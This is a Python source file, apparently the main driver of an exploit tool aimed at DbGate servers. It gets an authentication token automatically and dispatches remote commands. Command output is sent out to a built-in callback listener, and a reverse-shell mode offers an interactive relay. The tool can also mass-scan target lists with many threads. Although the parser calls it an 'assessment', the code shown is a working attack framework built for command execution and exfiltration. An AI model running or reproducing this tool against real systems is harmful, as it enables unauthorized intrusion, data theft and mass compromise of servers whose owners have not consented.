    is_url = re.match(r"^https?://", target, re.I) is not None
    # A non-URL ending in .txt is treated as a list file even when it does not
    # exist, so the caller can report "file not found" rather than scan it.
    looks_like_file = os.path.isfile(target) or (
        not is_url and target.lower().endswith(".txt")
    )
    if looks_like_file:
        return "mass", target, cmd
    return "single", target, cmd


def apply_auto_defaults(cfg: RunConfig) -> None:
    """Fill everything automatically — no extra questions.

    Overwrites auth, transport, command and callback settings on ``cfg``;
    ``mode``, ``url`` and ``targets_file`` are left untouched.
    """
    cfg.login_body = {"amoid": "none"}
    cfg.token = None
    cfg.default_port = DEFAULT_PORT
    cfg.timeout = DEFAULT_TIMEOUT
    cfg.verify_ssl = False
    cfg.vector = "both"
    cfg.check_only = False
    cfg.command = "id"
    cfg.async_exec = False
    cfg.b64_exfil = True
    cfg.wait_exfil = 8.0
    cfg.use_callback = True
    cfg.use_builtin_listener = True
    cfg.listen_bind = "0.0.0.0"
    cfg.listen_port = DEFAULT_CALLBACK_PORT
    cfg.callback_host = guess_lan_ip()
    cfg.callback_url = build_callback_url(cfg.callback_host, cfg.listen_port)
    cfg.threads = DEFAULT_CONCURRENCY
    cfg.mass_wait_exfil = 8.0


def print_auto_summary(cfg: RunConfig) -> None:
    """Print the configuration chosen by the wizard."""
    print()
    log_info("AUTO configuration")
    if cfg.mode == "mass":
        log_info(f" Mode : mass file={cfg.targets_file}")
        log_info(f" Threads : {cfg.threads}")
    else:
        log_info(f" Mode : single target={cfg.url}")
    log_info(" Auth : POST /auth/login → Bearer (automatic)")
    log_info(f" Command : {cfg.command}")
    log_info(f" Vector : {cfg.vector}")
    log_info(f" Callback : {cfg.callback_url}")
    log_info(f" Listener : {cfg.listen_bind}:{cfg.listen_port}")
    print()


def run_wizard() -> RunConfig:
    """Ask the one wizard question and return a fully populated RunConfig.

    Exits the process with status 1 when a list file was named but does not
    exist.
    """
    show_banner()
    log_info("AUTO — one question (optional: URL|command e.g. http://ip:3000|ls -la)")
    raw = ask("Target URL or list.txt", "http://127.0.0.1:3000")

    cfg = RunConfig()
    mode, target, opt_cmd = detect_target_input(raw)
    cfg.mode = mode
    if mode == "mass":
        cfg.targets_file = target
        if not os.path.isfile(cfg.targets_file):
            log_fail(f"List file not found: {cfg.targets_file}")
            sys.exit(1)
    else:
        cfg.url = ensure_target_url(target, DEFAULT_PORT)

    apply_auto_defaults(cfg)
    # The optional "|command" part overrides the automatic default command.
    if opt_cmd:
        cfg.command = opt_cmd
    print_auto_summary(cfg)
    return cfg


async def preflight_verify(cfg: RunConfig) -> bool:
    """Verify environment before any exploit attempt — abort if critical checks fail.

    Creates the output tree, resolves the target list (mass mode) or the
    single URL, validates reverse-shell/callback settings and, for a single
    target without a token, performs the login round-trip.

    Returns:
        ``True`` when the run may proceed, ``False`` after logging the reason
        otherwise.  ``cfg.resolved_targets``, ``cfg.target_commands`` and
        possibly ``cfg.token`` are updated as a side effect.
    """
    log_info("═══ Preflight verification ═══")
    try:
        init_nx_output()
    except OSError as exc:
        # An unwritable output directory is a preflight failure, not a crash.
        log_fail(f"Cannot prepare output folder {OUT_DIR}: {exc}")
        return False

    if cfg.mode == "mass":
        if not os.path.isfile(cfg.targets_file):
            log_fail(f"List file missing: {cfg.targets_file}")
            return False
        urls, per_cmds, stats, errors = load_targets_smart(
            cfg.targets_file, cfg.default_port
        )
        write_list_report(
            cfg.targets_file,
            stats,
            urls,
            errors,
            default_port=cfg.default_port,
            per_cmds=per_cmds,
        )
        cfg.resolved_targets = urls
        cfg.target_commands = per_cmds
        if per_cmds:
            log_info(f"Per-target commands: {len(per_cmds)} line(s) with |command")
        log_info(
            f"List: raw={stats.raw} resolved={stats.resolved} "
            f"dup={stats.dup} invalid={stats.invalid} → {OUT_LIST_REPORT}"
        )
        if stats.resolved == 0:
            log_fail("No valid targets after parsing list — fix list_report.txt")
            return False
        if stats.invalid > 0:
            log_warn(f"{stats.invalid} invalid lines — see {OUT_LIST_REPORT}")
    else:
        if not cfg.url:
            log_fail("No target URL")
            return False
        cfg.resolved_targets = [cfg.url]
        log_info(f"Target normalized: {cfg.url}")

    if cfg.reverse_shell and not cfg.check_only:
        # Reject the unsupported combination before announcing the endpoint.
        if cfg.mode != "single":
            log_fail("--reverse-shell supports single target (-u) only")
            return False
        log_info(
            f"Revsh: target should connect to {cfg.revsh_lhost}:{cfg.revsh_lport} "
            f"(listener bind {cfg.revsh_bind})"
        )

    if cfg.use_callback and not cfg.check_only and not cfg.reverse_shell:
        if cfg.callback_host in ("127.0.0.1", "localhost"):
            tgt = cfg.url or (cfg.resolved_targets[0] if cfg.resolved_targets else "")
            if tgt and "127.0.0.1" not in tgt and "localhost" not in tgt:
                log_warn(
                    "Callback host is localhost but target looks remote — "
                    "exfil may fail; set LAN IP in --callback-host"
                )

    if cfg.mode == "single" and cfg.url and not cfg.token:
        log_info("Preflight: testing target reachability + auto-login...")
        if not await prefetch_token(cfg):
            log_fail("Preflight failed: cannot reach target or obtain token")
            return False

    log_ok("Preflight passed — starting scan")
    print()
    return True


async def prefetch_token(cfg: RunConfig) -> bool:
    """Fetch Bearer token before scan (single target) so user sees it succeeded.

    Returns ``True`` immediately when a token is already set or no URL is
    configured.  On success the token is stored in ``cfg.token``.
    """
    if cfg.token or not cfg.url:
        return True

    login_body = cfg.login_body or {"amoid": "none"}
    client = DbGateExploit(
        cfg.url,
        timeout=cfg.timeout,
        verify_ssl=cfg.verify_ssl,
        login_body=login_body,
    )
    connector = aiohttp.TCPConnector(ssl=cfg.verify_ssl, limit=1)
    async with aiohttp.ClientSession(connector=connector) as session:
        if not await client.probe_alive(session):
            log_fail(f"[{client.tag}] cannot reach target for login")
            return False
        if not await client.obtain_token(session):
            return False
        cfg.token = client.token
    return True


def write_session_summary(cfg: RunConfig, stats: Dict[str, int]) -> None:
    """Write the session's settings and result counters to ``OUT_SUMMARY`` as JSON.

    Best effort: a write failure is reported as a warning and never raised.
    """
    doc = {
        "session": SESSION_ID,
        "mode": cfg.mode,
        "command": cfg.command,
        "vector": cfg.vector,
        "callback": cfg.callback_url,
        "reverse_shell": cfg.reverse_shell,
        "revsh_lhost": cfg.revsh_lhost,
        "revsh_lport": cfg.revsh_lport,
        "targets": cfg.resolved_targets,
        "stats": stats,
        "output_dir": os.path.abspath(OUT_DIR),
    }
    try:
        with open(OUT_SUMMARY, "w", encoding="utf-8") as fh:
            json.dump(doc, fh, indent=2)
    except OSError as exc:
        log_warn(f"Cannot write summary {OUT_SUMMARY}: {exc}")
    else:
        log_info(f"Summary → {OUT_SUMMARY}")


def _start_revsh_listener(cfg: RunConfig) -> "TcpRevshListener":
    """Bind the reverse-shell listener and point ``cfg.command`` at it; exit on failure."""
    if cfg.mode != "single":
        log_fail("--reverse-shell: use -u for one target only")
        sys.exit(1)
    try:
        listener = TcpRevshListener(cfg.revsh_bind, cfg.revsh_lport)
        actual_port = listener.start()
        # The port actually bound is the one baked into the command.
        cfg.revsh_lport = actual_port
        cfg.command = build_reverse_shell_cmd(cfg.revsh_lhost, actual_port)
        log_ok(f"Revsh dial address (from target): {cfg.revsh_lhost}:{actual_port}")
    except OSError as exc:
        log_fail(f"Cannot start reverse-shell listener: {exc}")
        sys.exit(1)
    return listener


def _start_exfil_listener(cfg: RunConfig) -> Tuple[HTTPServer, str]:
    """Start the built-in callback server; return it with the callback URL; exit on failure."""
    try:
        server, actual_port = start_exfil_server(cfg.listen_bind, cfg.listen_port)
        cfg.listen_port = actual_port
        callback_url = build_callback_url(
            cfg.callback_host or guess_lan_ip(), actual_port
        )
        cfg.callback_url = callback_url
        log_ok(f"Callback URL (target must reach this): {callback_url}")
        log_info(f"Listener bind: {cfg.listen_bind}:{actual_port}")
    except OSError as exc:
        log_fail(f"Cannot start exfil listener: {exc}")
        sys.exit(1)
    return server, callback_url


def _report_single_result(cfg: RunConfig, result: str) -> None:
    """Log the outcome of a single-target run plus a hint for unconfirmed cases."""
    log_ok(f"Final result: {result.upper()} — {describe_result(result)}")
    if result == "exfil":
        log_ok(f"Per-target exfil → {nx_exfil_path(cfg.url)}")
    elif result == "revsh":
        if cfg.revsh_interactive:
            log_ok("Reverse TCP session ended — see Nx/revsh.txt")
        else:
            log_ok(
                "Reverse TCP verified (connection only) — see Nx/revsh.txt; "
                "add --revsh-interactive or use: nc -lvnp PORT"
            )
    elif result == "dispatch":
        if cfg.reverse_shell:
            log_warn(
                "Not confirmed: no TCP reverse connection. "
                "Use an IP reachable from DbGate (Docker: host gateway, not 127.0.0.1)."
            )
        else:
            log_warn(
                "Not confirmed: runner accepted the job but no output hit the listener. "
                "Try --callback-host with an IP reachable from the DbGate container."
            )


async def _run_single_target(
    cfg: RunConfig,
    command: str,
    callback_url: Optional[str],
    revsh_listener: "Optional[TcpRevshListener]",
) -> None:
    """Run the full chain against ``cfg.url``, then write the summary and report."""
    client = DbGateExploit(
        cfg.url,
        timeout=cfg.timeout,
        verify_ssl=cfg.verify_ssl,
        token=cfg.token,
        login_body=cfg.login_body,
    )
    result = await client.full_chain(
        command=command,
        callback_url=callback_url if cfg.use_callback else None,
        vector=cfg.vector,
        check_only=cfg.check_only,
        async_exec=cfg.async_exec or cfg.reverse_shell,
        b64_exfil=cfg.b64_exfil,
        wait_exfil=cfg.wait_exfil,
        use_reverse_shell=cfg.reverse_shell,
        wait_revsh=cfg.wait_revsh,
        revsh_listener=revsh_listener,
        revsh_interactive=cfg.revsh_interactive,
    )
    stats: Dict[str, int] = {
        "exfil": 0,
        "dispatch": 0,
        "vuln": 0,
        "fail": 0,
        "revsh": 0,
    }
    stats[result] = stats.get(result, 0) + 1
    write_session_summary(cfg, stats)
    _report_single_result(cfg, result)


async def _run_mass_scan(
    cfg: RunConfig, command: str, callback_url: Optional[str]
) -> None:
    """Scan every resolved target, then print totals and write the summary."""
    targets = cfg.resolved_targets
    if not cfg.check_only and cfg.use_callback and not callback_url:
        log_warn("Mass mode without callback — blind dispatch only")

    # Clamp once so the logged value is the one actually used.
    workers = max(1, min(cfg.threads, 200))
    log_info(
        f"Mass scan: {len(targets)} targets threads={workers} "
        f"vector={cfg.vector}"
    )
    stats = await mass_scan(
        targets,
        command,
        callback_url if cfg.use_callback else None,
        cfg.vector,
        cfg.check_only,
        workers,
        cfg.timeout,
        cfg.verify_ssl,
        cfg.token,
        cfg.login_body,
        cfg.async_exec,
        cfg.b64_exfil,
        cfg.wait_exfil if len(targets) == 1 else cfg.mass_wait_exfil,
        cfg.target_commands,
    )
    print(Fore.MAGENTA + "─" * 80 + Style.RESET_ALL)
    log_ok(
        f"Done EXFIL={stats.get('exfil', 0)} DISPATCH={stats.get('dispatch', 0)} "
        f"VULN={stats.get('vuln', 0)} FAIL={stats.get('fail', 0)}"
    )
    log_ok(f"Results in {os.path.abspath(OUT_DIR)}/")
    write_session_summary(cfg, stats)


def _shutdown_listeners(
    exfil_srv: Optional[HTTPServer],
    revsh_listener: "Optional[TcpRevshListener]",
) -> None:
    """Stop whichever local listeners were started; never raises for the HTTP server."""
    if exfil_srv:
        try:
            exfil_srv.shutdown()
            exfil_srv.server_close()
        except Exception as exc:  # best effort during teardown
            log_warn(f"Exfil listener shutdown failed: {exc}")
    if revsh_listener:
        revsh_listener.close()


async def run_from_config(cfg: RunConfig) -> None:
    """Run preflight, start the needed listener, and execute the scan for ``cfg``.

    Exits the process with status 1 when preflight fails or a listener cannot
    be started.  Any listener that was started is shut down on every exit
    path, including the single-target path and when the scan raises.
    """
    if not await preflight_verify(cfg):
        sys.exit(1)

    exfil_srv: Optional[HTTPServer] = None
    revsh_listener: Optional[TcpRevshListener] = None
    callback_url = cfg.callback_url

    try:
        if cfg.reverse_shell and not cfg.check_only:
            revsh_listener = _start_revsh_listener(cfg)

        if (
            cfg.use_builtin_listener
            and cfg.use_callback
            and not cfg.check_only
            and not cfg.reverse_shell
        ):
            exfil_srv, callback_url = _start_exfil_listener(cfg)

        # Read the command only now: reverse-shell mode builds it after binding.
        command = "" if cfg.check_only else cfg.command

        if cfg.mode == "single":
            await _run_single_target(cfg, command, callback_url, revsh_listener)
        else:
            await _run_mass_scan(cfg, command, callback_url)
    finally:
        _shutdown_listeners(exfil_srv, revsh_listener)


# ── optional CLI mode (--cli) ─────────────────────────────────────────────────


def build_arg_parser() -> argparse.ArgumentParser:
    """Build the parser for ``--cli`` mode (without ``--cli`` the wizard runs)."""
    p = argparse.ArgumentParser(
        description="DbGate assessment — use without --cli for wizard"
    )
    p.add_argument(
        "--cli", action="store_true", help="Use command-line flags instead of wizard"
    )
    p.add_argument("-u", "--url")
    p.add_argument("-f", "--file", default=DEFAULT_TARGETS)
    p.add_argument("-c", "--callback")
    p.add_argument("--cmd", "--command", dest="command", default="id")
    p.add_argument("--check-only", action="store_true")
    p.add_argument("--vector", choices=DbGateExploit.VECTORS, default="functionName")
    p.add_argument("--token")
    p.add_argument("--login-json", default='{"amoid":"none"}')
    p.add_argument("-t", "--threads", type=int, default=DEFAULT_CONCURRENCY)
    p.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT)
    p.add_argument("--port", type=int, default=DEFAULT_PORT)
    p.add_argument("--listen-host", default="0.0.0.0")
    p.add_argument("--listen-port", type=int, default=DEFAULT_CALLBACK_PORT)
    p.add_argument(
        "--callback-host", help="IP/hostname targets use to reach your listener"
    )
    p.add_argument("--async-exec", action="store_true")
    p.add_argument("--no-b64", action="store_true")
    p.add_argument("--wait-exfil", type=float, default=8.0)
    p.add_argument(
        "--reverse-shell",
        nargs="?",
        const="AUTO",
        metavar="LHOST:LPORT",
        help="TCP reverse shell (single -u only). Default: guessed LAN IP:4444",
    )
    p.add_argument(
        "--revsh-bind",
        default="0.0.0.0",
        help="Local bind address for reverse-shell listener",
    )
    p.add_argument(
        "--revsh-port",
        type=int,
        default=DEFAULT_REVSH_PORT,
        help="Local port when --reverse-shell has no LHOST:LPORT (default 4444)",
    )
    p.add_argument(
        "--wait-revsh",
        type=float,
        default=15.0,
        help="Seconds to wait for reverse TCP after dispatch",
    )
    p.add_argument(
        "--revsh-interactive",
        action="store_true",
        help="After reverse TCP connect, relay stdin/stdout (basic; nc is better for TTY)",
    )
    p.add_argument(
        "--mass-wait-exfil",
        type=float,
        default=8.0,
        help="Per-target exfil wait in mass mode (default 8s; was capped at 3s)",
    )
    p.add_argument(
        "--secure", action="store_true", help="Enable TLS certificate verification"
    )
    return p


async def run_from_cli(args: argparse.Namespace) -> None:
    """Translate parsed ``--cli`` flags into a RunConfig and run it.

    Exits the process with status 1 on an invalid ``--login-json`` or an
    invalid ``--reverse-shell`` combination/endpoint.
    """
    login_body, err = parse_login_json(args.login_json)
    if err:
        log_fail(err)
        sys.exit(1)

    cfg = RunConfig()
    # A URL selects single mode; otherwise the list file is used.
    cfg.mode = "single" if args.url else "mass"
    cfg.url = ensure_target_url(args.url, args.port) if args.url else ""
    cfg.targets_file = args.file
    cfg.default_port = args.port
    cfg.check_only = args.check_only
    cfg.command = args.command
    cfg.vector = args.vector
    cfg.token = args.token
    # Keep the raw text in step with the parsed body.
    cfg.login_json = args.login_json
    cfg.login_body = login_body
    cfg.threads = args.threads
    cfg.timeout = args.timeout
    cfg.verify_ssl = args.secure
    cfg.async_exec = args.async_exec
    cfg.b64_exfil = not args.no_b64
    cfg.wait_exfil = args.wait_exfil
    cfg.mass_wait_exfil = args.mass_wait_exfil

    if args.reverse_shell is not None:
        if not args.url:
            log_fail("--reverse-shell requires a single target: -u http://host:3000")
            sys.exit(1)
        if args.check_only:
            log_fail("--reverse-shell cannot be used with --check-only")
            sys.exit(1)
        try:
            lhost, lport = parse_revsh_endpoint(args.reverse_shell, args.revsh_port)
        except (ValueError, OSError) as exc:
            log_fail(f"Invalid --reverse-shell endpoint: {exc}")
            sys.exit(1)
        cfg.reverse_shell = True
        # An explicit --callback-host wins over the parsed LHOST.
        cfg.revsh_lhost = args.callback_host or lhost
        cfg.revsh_lport = lport
        cfg.revsh_bind = args.revsh_bind
        cfg.wait_revsh = args.wait_revsh
        cfg.revsh_interactive = args.revsh_interactive
        cfg.use_callback = False
        cfg.use_builtin_listener = False
        cfg.async_exec = True
        cfg.command = ""  # built after listener bind in run_from_config
        log_info(
            f"Reverse shell mode → target dials {cfg.revsh_lhost}:{cfg.revsh_lport}"
        )
    else:
        cfg.use_callback = bool(args.callback) or (
            not args.check_only and bool(args.command)
        )
        cfg.callback_url = args.callback
        cfg.listen_bind = args.listen_host
        cfg.listen_port = args.listen_port
        # The built-in listener is only used when no external callback was given.
        cfg.use_builtin_listener = not args.callback and not args.check_only
        if cfg.use_builtin_listener:
            cfg.callback_host = args.callback_host or guess_lan_ip()
            if not cfg.callback_url:
                cfg.callback_url = build_callback_url(
                    cfg.callback_host, cfg.listen_port
                )

    await run_from_config(cfg)


async def async_main() -> None:
    """Dispatch to CLI mode when ``--cli`` is given, otherwise run the wizard."""
    parser = build_arg_parser()
    args = parser.parse_args()
    if args.cli:
        show_banner()
        await run_from_cli(args)
    else:
        cfg = run_wizard()
        await run_from_config(cfg)


def main() -> None:
    """Synchronous entry point; Ctrl-C is reported as a warning, not a traceback."""
    try:
        asyncio.run(async_main())
    except KeyboardInterrupt:
        print()
        log_warn("Interrupted")


if __name__ == "__main__":
    main()